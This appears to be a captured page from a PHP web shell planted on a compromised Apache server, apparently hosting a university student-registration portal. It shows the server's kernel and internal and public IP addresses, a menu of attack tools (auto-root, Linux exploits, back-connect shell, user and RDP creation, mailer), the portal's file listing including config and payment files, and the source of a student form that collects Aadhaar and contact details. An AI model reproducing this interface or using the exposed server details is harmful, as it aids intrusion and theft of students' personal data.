Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.133.153.232
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
student /
cug /
[ HOME SHELL ]
Name
Size
Permission
Action
copy_to_oasis
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
easy_zip
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
jquery-inputmask
[ DIR ]
drwxr-xr-x
jquery-ui-1.9
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
links
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tarka_pdf
[ DIR ]
drwxr-xr-x
Default.aspx
31.47
KB
-rwxr-xr-x
Default_bkp.aspx
31.47
KB
-rwxr-xr-x
Login.aspx
10.32
KB
-rwxr-xr-x
Login_wait.aspx
4.23
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
candidate_list.html
4.29
KB
-rwxr-xr-x
cconfig.php
1.17
KB
-rwxr-xr-x
cconfig_old.php
1.12
KB
-rwxr-xr-x
index.php
4.12
KB
-rwxr-xr-x
index_vskub.php
5.59
KB
-rwxr-xr-x
index_wait.php
5.52
KB
-rwxr-xr-x
payment_gate_way_responce.php
6.51
KB
-rwxr-xr-x
payment_gateway.php
7.85
KB
-rwxr-xr-x
student.php
15.71
KB
-rwxr-xr-x
subjectDetails.php
1.14
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : student.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link rel="shortcut icon" type="image/jpg" href="img/favicon.jpg" /> <?php require_once("links/js_files.php");?> <script src="js/candidate_list.js"></script> <script src="jquery-inputmask/jquery.inputmask.bundle.js"></script> <script src="jquery-inputmask/jquery.inputmask.bundle.min.js"></script> <script> $(document).ready(function(){ $("#T17").inputmask("d/m/y",{ "placeholder": "dd/mm/yyyy" }); }); </script> <script type="text/javascript"> $(function(){ $('.index_label_div').corner("5px").css("border","1px solid #336699"); $('.messageboard-div').corner("5px").css("border","1px solid #336699"); $('.submit_div_button').corner("5px"); $('.div_app_form_center_blue').corner("5px").css("border","1px solid #336699"); $('#tabs').tabs(); $('.ui-tabs .ui-tabs-nav li a').corner("tl tr"); $("#guidelines").load("links/guidelines.html"); OnloadCall() function OnloadCall() { url_object=GetUrlParameters(); var r=url_object['r']; var c=url_object['c']; var li=url_object['li']; $("#result_error_div").hide(); DisplayStudentSubjectDetails(r,c,li); } }); </script> <style> .lar-input-1 { width:270px; height:25px; border-radius:5px; text-align:left; font-size:16px; padding:3px 10px; margin:5px 2px; } .lar-input-2 { width:380px; height:25px; border-radius:5px; text-align:left; font-size:16px; padding:3px 10px; } .lar-input-3 { width:300px; height:25px; border-radius:5px; text-align:left; font-size:16px; padding:3px 10px; } .lar-input-4 { width:100px; height:25px; border-radius:5px; text-align:left; font-size:16px; padding:3px 10px; } .lar-input-5 { width:150px; height:25px; border-radius:5px; text-align:left; font-size:16px; padding:3px 10px; } .lar-select-1 { width:295px; height:35px; border-radius:5px; text-align:left; font-size:16px; padding:5px 10px; margin:5px 2px; } .lar-label-1 { font-size:15px; font-style:Arial; } .lar-button-1 { width:100px; height:25px; border-radius:5px; text-align:Center; margin-left:300px; } </style> </head> <body> <div id='main_frame'> <div class='header_main_div'> <?php require_once("links/header.php");?> <div style='height:auto;overflow:auto;background:#FFFFFF;'> <div style="margin-top: 6px; border-bottom: solid 1px #979595; font-size: 12px; font-weight: bold;height:29px;background:#FFFFFF;" > <div id="ContentPlaceHolder1_resultDate" style='float:left;'> <div style="height: 20px; width: 314px; text-align: left;float:left; padding-left: 10px; padding-top: 7px; color: Red" id="ResultpersonalLeftDiv"> <span style="font-weight: bold;" id="ContentPlaceHolder1_lblDate"> </span> </div> </div> <div id="ContentPlaceHolder1_lastDate"> <div style="height: 20px; width: 600px; float: right; text-align: right; padding-right: 10px; padding-top: 12px; color: Red" id="ResultpersonalRightDiv"> <span style="font-weight: bold;" id="ContentPlaceHolder1_lblExmLastDate"></span> </div> </div> </div> <div id='tabs'> <ul> <li><a href='#guidelines'>Registration Guidelines</a></li> <?php session_start(); if($_SESSION['FUNIVCODE'] == '031') { ?> <li><a href='#personal_details' >Personal Details</a></li> <?php } ?> <li><a href='#index_main_page_result'>Registration Form</a></li> <li><a href='#applications' onclick='javascript:DisplayApplications();' >Your Applications</a></li> <li id='download_admtcard_enable' style='display:none;' ><a href='#downloadAdmissionTicket' >Download Admission Ticket</a></li> </ul> <div id="index_main_page_result"> <div id='result_error_div' style='display:none;'> </div> <div id='result_success_div'></div> </div> <div id="guidelines" style='min-height:200px;overflow:auto;'></div> <div id="personal_details" style='min-height:200px;overflow:auto;margin:0px;padding:0px;'> <div style = " width:95%; height:600px; margin-top:20px;margin-left:20px;"> <table style = "margin-left:0px;clear:both;float:left;"> <tr> <td style = "width:120px;"><label class = "lar-label-1" >Name </label></td> <td ><input type = "text" class = "lar-input-1" id = "T1" placeholder = "Name" title = "Name" onkeydown = "onfocusvalidatepersonal(event)" > </td> </tr> <tr> <td style = "width:120px;" ><label class = "lar-label-1" >Date of Birth</label></td> <td> <input type = "text" class = "lar-input-4" id = "T17" title = "Date of Birth" onkeydown = "onfocusvalidatepersonal(event)" placeholder = "dd/mm/yyyy"> <!--<img align='center' id='student_entry_atphoto' src='img/default_photo.jpg' onchange='DisplayUserSelectedPhotoAtDwn()' style='width:90px;z-index:1;height:100px; width:90px'></img>--> </td> </tr> <tr> <td style = "width:120px;" ><label class = "lar-label-1" >Gender</label></td> <td> <select name="gender" id="T5" class = "lar-select-1" title = "Gender" onkeydown = "onfocusvalidatepersonal(event)" > <option value="">Select Gender</option> <option value="M">Male</option> <option value="F">Female</option> <option value="T">Transgender</option> </select> </td> </tr> <tr> <td style = "width:120px;"><label class = "lar-label-1" >Category</label></td> <td> <select name="cat" id="T6" class = "lar-select-1" title = "Category" onkeydown = "onfocusvalidatepersonal(event)" > <option value="" >Select Category</option> </select> </td> </tr> </table> <div id='uploadPhotoToAdmcard' style='clear:both;float:left;margin-top:-220px;margin-left:210px'> <form name="form_module_image_upload" id="form_module_image_upload" enctype='multipart/form-data' action="#" method="post"> <div id='input_div_14' style='margin-right:19px;float:left;margin:20px 20px;margin-left:400px;' > <img align='center' id='student_entry_atphoto' src='img/default_photo.jpg' onchange='DisplayUserSelectedPhotoAtDwn()' style='width:148px;z-index:1;height:160px; width:148px'></img> </div> <div style='width:135Px;height:10px;'></div> <div id='input_div_14' style='width:200px;margin-right:19px;float:left;margin-left:400px;dispaly:none;'> <input type='file' id="student_entry_upload" size='20' name="student_entry_upload" onchange="DisplayUserSelectedPhotoAtDwn();" style="height:23px;width:190px;dispaly:none;" > </div> </form> </div> <table> <tr> <td style = "width:120px;"><label class = "lar-label-1" >Father's Name </label></td> <td ><input type = "text" class = "lar-input-1" id = "T2" placeholder = "Father's Name" title = "Father's Name" onkeydown = "onfocusvalidatepersonal(event)" > </td> <td style = "width:50px"></td> <td style = "width:120px;"><label class = "lar-label-1">Mother's Name </label></td> <td ><input type = "text" class = "lar-input-1" id = "T3" placeholder = "Mother's Name" title = "Mother's Name" onkeydown = "onfocusvalidatepersonal(event)" > </td> </tr> <tr> <td style = "width:120px;"> <label class = "lar-label-1" >Postal Address</label> </td> <td ><input type = "text" class = "lar-input-1" id = "T7" style='margin-bottom:-20px;' maxlength = "50" placeholder = "Postal Address" title = "Postal Address" onkeydown = "onfocusvalidatepersonal(event)" > </td> <td style = "width:50px"></td> <td style = "width:120px;"><label class = "lar-label-1">Permanent Address</label></td> <td ><input type = "text" class = "lar-input-1" id = "T11" style='margin-bottom:-20px;' maxlength = "50" placeholder = "Permanent Address" title = "Permanent Address" onkeydown = "onfocusvalidatepersonal(event)" > </td> </tr> <tr> <td style = "width:120px;"> <label class = "lar-label-1" ></label> </td> <td ><input type = "text" class = "lar-input-1" id = "T8" style='margin-bottom:-10px;' maxlength = "50" placeholder = "Postal Address" title = "Postal Address" onkeydown = "onfocusvalidatepersonal(event)" > </td> <td style = "width:50px"></td> <td style = "width:120px;"><label class = "lar-label-1"></label></td> <td ><input type = "text" class = "lar-input-1" id = "T12" style='margin-bottom:-10px;' maxlength = "50" placeholder = "Permanent Address" title = "Permanent Address" onkeydown = "onfocusvalidatepersonal(event)" > </td> </tr> <tr> <td style = "width:120px;"> <label class = "lar-label-1" ></label> </td> <td ><input type = "text" class = "lar-input-1" id = "T9" style='margin-bottom:-10px;' maxlength = "50" placeholder = "Postal Address" title = "Postal Address" onkeydown = "onfocusvalidatepersonal(event)" > </td> <td style = "width:50px"></td> <td style = "width:120px;"><img src="images/arrow.jpg" alt="Smiley face" height="42" width="42" onclick = "getaddress()" ></td> <td ><input type = "text" class = "lar-input-1" id = "T13" style='margin-bottom:-10px;' maxlength = "50" placeholder = "Permanent Address" title = "Permanent Address" onkeydown = "onfocusvalidatepersonal(event)" > </td> </tr> <tr> <td style = "width:120px;"> <label class = "lar-label-1" ></label> </td> <td ><input type = "text" class = "lar-input-1" id = "T10" style='margin-bottom:-10px;' maxlength = "50" placeholder = "Postal Address" title = "Postal Address" onkeydown = "onfocusvalidatepersonal(event)" > </td> <td style = "width:50px"></td> <td style = "width:120px;"><label class = "lar-label-1"></label></td> <td ><input type = "text" class = "lar-input-1" id = "T14" style='margin-bottom:-10px;' maxlength = "50" placeholder = "Permanent Address" title = "Permanent Address" onkeydown = "onfocusvalidatepersonal(event)" > </td> </tr> <tr> <td style = "width:120px;"> <label class = "lar-label-1" >Pin Code</label> </td> <td ><input type = "text" class = "lar-input-1" id = "T18" style='margin-top:20px;' maxlength = "6" placeholder = "Pin Code" title = "Pin Code" onkeypress="return acceptNumbersOnlyForModule(event);" onkeydown = "onfocusvalidatepersonal(event)" > </td> <td style = "width:50px"></td> <td style = "width:120px;"><label class = "lar-label-1">Pin Code</label></td> <td ><input type = "text" class = "lar-input-1" id = "T19" style='margin-top:20px;' maxlength = "6" placeholder = "Pin Code" title = "Pin Code" onkeypress="return acceptNumbersOnlyForModule(event);" onkeydown = "onfocusvalidatepersonal(event)" > </td> </tr> <tr> <td style = "width:120px;"><label class = "lar-label-1" >Mobile No.</label></td> <td ><input type = "text" class = "lar-input-1" id = "T15" maxlength = '10' placeholder = "Mobile No." title = "Mobile No." onkeypress="return acceptNumbersOnlyForModule(event);" onkeydown = "onfocusvalidatepersonal(event)" > </td> <td style = "width:50px"></td> <td style = "width:120px;"><label class = "lar-label-1">Email</label></td> <td ><input type = "text" class = "lar-input-1" id = "T16" placeholder = "Email" title = "Email" onkeydown = "onfocusvalidatepersonal(event)" > </td> </tr> <tr> <td style = "width:120px;"><label class = "lar-label-1" >Aadhar No.</label></td> <td ><input type = "text" class = "lar-input-1" id = "T20" maxlength = '10' placeholder = "Aadhar No." title = "Aadhar No." onkeydown = "onfocusvalidatepersonal(event)" > </td> </tr> </table> <br><br> <!--<button class = "lar-button-1" onclick="Validate();">Submit</button>--> </div> <div style = " width:500px; height:600px; margin-top:0px;margin-left:20px;border:1px;"> <label style = "margin:0px;padding:0px;clear:both;font-size:25px;">Declaration</label> <br> <table style = "margin-left:0px;clear:both;float:left;" border = 1 > <tr > <td style = "width:30px;font-size:15px;"><p>Receiving Fellowship?</p></td> <td ><input type = "checkbox" id = "T21" name = "a" title = "Receiving Fellowship" onclick = "showfiled()" > </td> </tr> <tr id = "test"> <td style = "width:120px;height:20px;" > <label>Source</label> <input type = "text" title = "Receiving Fellowship" class = "lar-input-1" id = "T22" placeholder = "Fellowship" title = "" > </td> <td> </td> </tr> <tr> <td style = "width:500px;font-size:15px;"><p>Been in any employment?</p></td> <td ><input type = "checkbox" id = "T23" name = "b" title = "Been in any employment" onclick = "showfiled()" > </td> </tr> <tr id = "test2"> <td style = "width:120px;height:40px;" > Where <input type = "text" id = "T24" title = "Been in any employment" class = "lar-input-1" placeholder = "employment" style = "height:30px;" > </td> <td> </td> </tr> <tr> <td style = "width:500px;font-size:15px;"><p>Resided in hostel</p></td> <td ><input type = "checkbox" id = "T25" name = "c" title = "Resided in hostel" onclick = "showfiled()" > </td> </tr> <tr id = "test3"> <td> Hostal Name <input type = "text" title = "Resided in hostel" id = "T26" class = "lar-input-1" placeholder = "Hostal Name" name = "c" > </td> </tr> </table> </div> </div> <div id="applications" style='min-height:200px;'> </div> <div id="downloadAdmissionTicket" style='min-height:360px;display:none;'> <div id='downloadAdm' class='raval_download' style='dispaly:none;margin-right:19px;width:300px;float:left;margin:20px 20px;margin-left:300px;' > <span onclick="GenerateAdmissionTicket();" style='float:left;margin-left:26px;cursor: pointer; line-height: 19px;font-size:14px;font-weight:bold;'>Download Admission Ticket</span> </div> <!--<div id='uploadPhotoToAdmcard' style='clear:both;'> <form name="form_module_image_upload" id="form_module_image_upload" enctype='multipart/form-data' action="#" method="post"> <div id='input_div_14' style='margin-right:19px;float:left;margin:20px 20px;margin-left:400px;' > <img align='center' id='student_entry_atphoto' src='img/default_photo.jpg' onchange='DisplayUserSelectedPhotoAtDwn()' style='width:148px;z-index:1;height:187px; width:148px'></img> </div> <div style='width:135Px;height:10px;'></div><div id='input_div_14' style='width:200px;margin-right:19px;float:left;margin-left:400px;'> <input type='file' id="student_entry_upload" size='20' name="student_entry_upload" onchange="DisplayUserSelectedPhotoAtDwn();" style="height:23px;width:190px;" > </div> <div class='raval_download' style='dispaly:none;margin-right:19px;width:100px;float:left;margin:20px 20px;margin-left:420px;' > <span onclick="uploadAdmissionTicketPhoto();" style='float:left;margin-left:26px;cursor: pointer; line-height: 19px;font-size:14px;font-weight:bold;'>Upload</span> </div> </form> </div>--> </div> </div> <?php require_once("links/footer.php");?> </div> </div> </div> </br> </body> </html>
Close